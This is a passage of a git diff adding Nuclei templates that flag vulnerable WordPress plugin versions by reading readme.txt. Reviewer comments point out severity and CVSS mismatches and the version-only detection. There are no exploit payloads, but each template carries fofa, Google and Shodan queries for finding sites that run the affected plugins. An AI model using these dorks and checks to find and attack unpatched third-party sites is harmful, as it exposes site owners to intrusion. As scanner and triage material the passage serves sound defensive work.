+ - compare_versions(version, '<= 2.27')
\ No newline at end of file
diff --git a/poc/remote_code_execution/nextcart-woocommerce-migration-2e2806962d8874bbd69c8d26bf481248.yaml b/poc/remote_code_execution/nextcart-woocommerce-migration-2e2806962d8874bbd69c8d26bf481248.yaml
new file mode 100644
index 0000000000..1c8b868434
--- /dev/null
+++ b/poc/remote_code_execution/nextcart-woocommerce-migration-2e2806962d8874bbd69c8d26bf481248.yaml
@@ -0,0 +1,59 @@
+id: nextcart-woocommerce-migration-2e2806962d8874bbd69c8d26bf481248
+
+info:
+ name: >
+ Next-Cart Store to WooCommerce Migration <= 3.9.2 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/abcebcdb-e22a-4b6c-86db-f95b00260446?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/nextcart-woocommerce-migration/"
+ google-query: inurl:"/wp-content/plugins/nextcart-woocommerce-migration/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,nextcart-woocommerce-migration,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/nextcart-woocommerce-migration/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "nextcart-woocommerce-migration"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.9.2')
\ No newline at end of file
diff --git a/poc/remote_code_execution/ni-woocommerce-cost-of-goods-66898c5242c9d33ba57cb7fe04ac3a35.yaml b/poc/remote_code_execution/ni-woocommerce-cost-of-goods-66898c5242c9d33ba57cb7fe04ac3a35.yaml
new file mode 100644
index 0000000000..2bb0e1884d
--- /dev/null
+++ b/poc/remote_code_execution/ni-woocommerce-cost-of-goods-66898c5242c9d33ba57cb7fe04ac3a35.yaml
@@ -0,0 +1,59 @@
+id: ni-woocommerce-cost-of-goods-66898c5242c9d33ba57cb7fe04ac3a35
+
+info:
+ name: >
+ Ni WooCommerce Cost Of Goods <= 3.2.8 - Authenticated (Administrator+) SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/68846ab2-684c-40ad-8a91-0b7d9de1ecde?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/ni-woocommerce-cost-of-goods/"
+ google-query: inurl:"/wp-content/plugins/ni-woocommerce-cost-of-goods/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,ni-woocommerce-cost-of-goods,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ni-woocommerce-cost-of-goods/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ni-woocommerce-cost-of-goods"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.2.8')
\ No newline at end of file
diff --git a/poc/remote_code_execution/woocommerce-ultimate-gift-card-f2d90f9b034e1f97969a83011a928867.yaml b/poc/remote_code_execution/woocommerce-ultimate-gift-card-f2d90f9b034e1f97969a83011a928867.yaml
new file mode 100644
index 0000000000..58695dc7f5
--- /dev/null
+++ b/poc/remote_code_execution/woocommerce-ultimate-gift-card-f2d90f9b034e1f97969a83011a928867.yaml
@@ -0,0 +1,59 @@
+id: woocommerce-ultimate-gift-card-f2d90f9b034e1f97969a83011a928867
+
+info:
+ name: >
+ WooCommerce Ultimate Gift Card - Create, Sell and Manage Gift Cards with Customized Email Templates < 2.9.1 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/859e9233-1e5d-4430-87c1-bcd8225b6258?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/woocommerce-ultimate-gift-card/"
+ google-query: inurl:"/wp-content/plugins/woocommerce-ultimate-gift-card/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,woocommerce-ultimate-gift-card,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woocommerce-ultimate-gift-card/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woocommerce-ultimate-gift-card"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '< 2.9.1')
\ No newline at end of file
diff --git a/poc/search/spatialmatch-free-lifestyle-search-67ee26ea0af5450a37293a361423bdd3.yaml b/poc/search/spatialmatch-free-lifestyle-search-67ee26ea0af5450a37293a361423bdd3.yaml
new file mode 100644
index 0000000000..6cdaa60845
--- /dev/null
+++ b/poc/search/spatialmatch-free-lifestyle-search-67ee26ea0af5450a37293a361423bdd3.yaml
@@ -0,0 +1,59 @@
+id: spatialmatch-free-lifestyle-search-67ee26ea0af5450a37293a361423bdd3
+
+info:
+ name: >
+ SpatialMatch IDX <= 3.0.9 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4f406c82-14e7-468b-8bba-400aefe687b5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/spatialmatch-free-lifestyle-search/"
+ google-query: inurl:"/wp-content/plugins/spatialmatch-free-lifestyle-search/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,spatialmatch-free-lifestyle-search,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/spatialmatch-free-lifestyle-search/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "spatialmatch-free-lifestyle-search"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0.9')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml b/poc/sql/CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml
new file mode 100644
index 0000000000..44f464f0ce
--- /dev/null
+++ b/poc/sql/CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e
+
+info:
+ name: >
+ Quotes llama <= 3.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Quotes llama plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'quotes-llama' shortcode in all versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5e2f3abd-0a15-4bc1-966a-22d606f3e333?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-10874
+ metadata:
+ fofa-query: "wp-content/plugins/quotes-llama/"
+ google-query: inurl:"/wp-content/plugins/quotes-llama/"
+ shodan-query: 'vuln:CVE-2024-10874'
+ tags: cve,wordpress,wp-plugin,quotes-llama,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/quotes-llama/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "quotes-llama"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0.0')
\ No newline at end of file
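Review bot: `severity: low` and the `low` tag disagree with `cvss-score: 6.4`, which falls in the CVSS v3.1 medium band (4.0–6.9). CVE-2024-11201 below has the same low/6.4 pair, and CVE-2024-11178 is marked `critical` with `cvss-score: 8.1`, which is the high band (7.0–8.9). Severity filters in a scan would therefore under-rank or over-rank these findings. Unless the generator deliberately adjusts severity by the privilege required (not visible here), I would derive it from the score: `severity: medium` and `tags: cve,wordpress,wp-plugin,quotes-llama,medium`.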
diff --git a/poc/sql/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml b/poc/sql/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml
new file mode 100644
index 0000000000..8a3dda0de2
--- /dev/null
+++ b/poc/sql/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db
+
+info:
+ name: >
+ Login With OTP <= 1.4.2 - Authentication Bypass via Weak OTP
+ author: topscoder
+ severity: critical
+ description: >
+ The Login With OTP plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.4.2. This is due to the plugin generating too weak OTP, and there’s no attempt or time limit. This makes it possible for unauthenticated attackers to generate and brute force the 6-digit numeric OTP that makes it possible to log in as any existing user on the site, such as an administrator, if they have access to the email.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d3775d48-5985-475e-8fb9-c4c5fd044772?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2024-11178
+ metadata:
+ fofa-query: "wp-content/plugins/otp-login/"
+ google-query: inurl:"/wp-content/plugins/otp-login/"
+ shodan-query: 'vuln:CVE-2024-11178'
+ tags: cve,wordpress,wp-plugin,otp-login,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/otp-login/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "otp-login"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.2')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19.yaml b/poc/sql/CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19.yaml
new file mode 100644
index 0000000000..4f40bc9c2f
--- /dev/null
+++ b/poc/sql/CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19
+
+info:
+ name: >
+ myCred – Loyalty Points and Rewards plugin <= 2.7.5.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via mycred_send Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The myCred – Loyalty Points and Rewards plugin for WordPress and WooCommerce – Give Points, Ranks, Badges, Cashback, WooCommerce rewards, and WooCommerce credits for Gamification plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mycred_send shortcode in all versions up to, and including, 2.7.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2d1d9bee-4afa-44cc-8e7a-8a73ad018c4a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11201
+ metadata:
+ fofa-query: "wp-content/plugins/mycred/"
+ google-query: inurl:"/wp-content/plugins/mycred/"
+ shodan-query: 'vuln:CVE-2024-11201'
+ tags: cve,wordpress,wp-plugin,mycred,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mycred"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.5.2')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef.yaml b/poc/sql/CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef.yaml
new file mode 100644
index 0000000000..0d113c79a7
--- /dev/null
+++ b/poc/sql/CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef
+
+info:
+ name: >
+ CLUEVO LMS, E-Learning Platform <= 1.13.2 - Cross-Site Request Forgery to Module Deletion
+ author: topscoder
+ severity: medium
+ description: >
+ The CLUEVO LMS, E-Learning Platform plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.13.2. This is due to missing or incorrect nonce validation on the cluevo_render_module_ui() function. This makes it possible for unauthenticated attackers to delete modules via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2a3056d4-5ee9-4b31-9ef8-0e55f470ad23?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-11444
+ metadata:
+ fofa-query: "wp-content/plugins/cluevo-lms/"
+ google-query: inurl:"/wp-content/plugins/cluevo-lms/"
+ shodan-query: 'vuln:CVE-2024-11444'
+ tags: cve,wordpress,wp-plugin,cluevo-lms,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cluevo-lms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cluevo-lms"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.13.2')
\ No newline at end of file
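Review bot: The matchers in this template only compare the `Stable tag` read from `readme.txt` with `1.13.2`; nothing in the `http:` block touches `cluevo_render_module_ui()` or its nonce handling, so a hit means "version in the affected range", not a confirmed CSRF. A readme whose tag is not numeric is not captured by `([0-9.]+)`, and a site that blocks `readme.txt` returns nothing, so the absence of a match is not evidence of a patched plugin. I would state that in the file, for example with a comment above `http:` such as `# Version-based detection only: reads Stable tag from readme.txt, does not verify the flaw`. The same applies to every other template added under `poc/sql/` in this diff, and most of them, like this CSRF one, are not SQL issues, so the directory name is misleading for triage.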
diff --git a/poc/sql/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml b/poc/sql/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml
new file mode 100644
index 0000000000..07e13f5eb2
--- /dev/null
+++ b/poc/sql/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11450-aa0eea523b63076daf425f6ddb400979
+
+info:
+ name: >
+ ONLYOFFICE Docs <= 2.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The ONLYOFFICE Docs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'onlyoffice' shortcode in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/80b71264-5b0f-41cb-86c1-a052d1976597?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11450
+ metadata:
+ fofa-query: "wp-content/plugins/onlyoffice/"
+ google-query: inurl:"/wp-content/plugins/onlyoffice/"
+ shodan-query: 'vuln:CVE-2024-11450'
+ tags: cve,wordpress,wp-plugin,onlyoffice,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/onlyoffice/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "onlyoffice"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.0')
\ No newline at end of file
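Review bot: `severity: low` here does not agree with `cvss-score: 6.4`, which falls in the CVSS 3.1 medium band (4.0–6.9); the trailing `low` on the `tags:` line carries the same value. If severity is meant to follow the score, this should read `severity: medium` with the tag changed to match. The same mismatch appears in CVE-2024-53745 and CVE-2024-53786 (6.4, low), CVE-2024-11823 (6.1, low), CVE-2024-11728 (7.5, marked `critical`) and, most importantly, CVE-2024-53790, where an 8.8 local file inclusion is marked `low`. Anyone filtering scan results by severity would drop that last finding, so the generator's severity mapping is worth checking against the linked Wordfence records.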
diff --git a/poc/sql/CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7.yaml b/poc/sql/CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7.yaml
new file mode 100644
index 0000000000..c7755d3077
--- /dev/null
+++ b/poc/sql/CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7
+
+info:
+ name: >
+ KiviCare – Clinic & Patient Management System (EHR) <= 3.6.4 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+ The KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'visit_type[service_id]' parameter of the tax_calculated_data AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/53c18834-3026-4d4d-888b-add314a0e56e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2024-11728
+ metadata:
+ fofa-query: "wp-content/plugins/kivicare-clinic-management-system/"
+ google-query: inurl:"/wp-content/plugins/kivicare-clinic-management-system/"
+ shodan-query: 'vuln:CVE-2024-11728'
+ tags: cve,wordpress,wp-plugin,kivicare-clinic-management-system,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/kivicare-clinic-management-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "kivicare-clinic-management-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.4')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml b/poc/sql/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml
new file mode 100644
index 0000000000..acfed4a378
--- /dev/null
+++ b/poc/sql/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2
+
+info:
+ name: >
+ Folder Gallery <= 1.7.4 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Folder Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'foldergallery' shortcode in all versions up to, and including, 1.7.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b4521959-416e-4ff5-96c0-bc4dbb0187b7?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11823
+ metadata:
+ fofa-query: "wp-content/plugins/folder-gallery/"
+ google-query: inurl:"/wp-content/plugins/folder-gallery/"
+ shodan-query: 'vuln:CVE-2024-11823'
+ tags: cve,wordpress,wp-plugin,folder-gallery,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/folder-gallery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "folder-gallery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.4')
\ No newline at end of file
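Review bot: The `cvss-metrics` vector `PR:N/UI:R` with score 6.1 contradicts the name and description, which both say the flaw requires an authenticated contributor-level account. The other contributor-level stored XSS templates in this diff carry `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N` with 6.4, so one of the two fields here is probably wrong; which one cannot be decided from the diff. Please check the Wordfence record linked in `reference` and correct the vector or the title before the classification is used for prioritisation.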
diff --git a/poc/sql/CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21.yaml b/poc/sql/CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21.yaml
new file mode 100644
index 0000000000..e491cf118e
--- /dev/null
+++ b/poc/sql/CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21
+
+info:
+ name: >
+ Pretty Simple Popup Builder <= 1.0.9 - Authenticated (Administrator+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Pretty Simple Popup Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only impacts multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9489f066-5898-4908-b3aa-cf856958cb4e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-39626
+ metadata:
+ fofa-query: "wp-content/plugins/pretty-simple-popup-builder/"
+ google-query: inurl:"/wp-content/plugins/pretty-simple-popup-builder/"
+ shodan-query: 'vuln:CVE-2024-39626'
+ tags: cve,wordpress,wp-plugin,pretty-simple-popup-builder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/pretty-simple-popup-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "pretty-simple-popup-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.9')
\ No newline at end of file
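Review bot: The description limits this issue to multi-site installations and installations where `unfiltered_html` has been disabled, but the `dsl` matcher `compare_versions(version, '<= 1.0.9')` reports every site that serves an affected version. A result therefore needs a manual check of the site configuration before the host is treated as exposed. I would record that next to the matcher, e.g. `# precondition not checked: multisite or unfiltered_html disabled (see description)`.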
diff --git a/poc/sql/CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb.yaml b/poc/sql/CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb.yaml
new file mode 100644
index 0000000000..a489ebd6fd
--- /dev/null
+++ b/poc/sql/CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb
+
+info:
+ name: >
+ 소셜 공유 버튼 By 코스모스팜 <= 1.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The 소셜 공유 버튼 By 코스모스팜 plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b4540b21-ef63-4cd2-b605-c66a7b76934f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53745
+ metadata:
+ fofa-query: "wp-content/plugins/cosmosfarm-share-buttons/"
+ google-query: inurl:"/wp-content/plugins/cosmosfarm-share-buttons/"
+ shodan-query: 'vuln:CVE-2024-53745'
+ tags: cve,wordpress,wp-plugin,cosmosfarm-share-buttons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cosmosfarm-share-buttons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
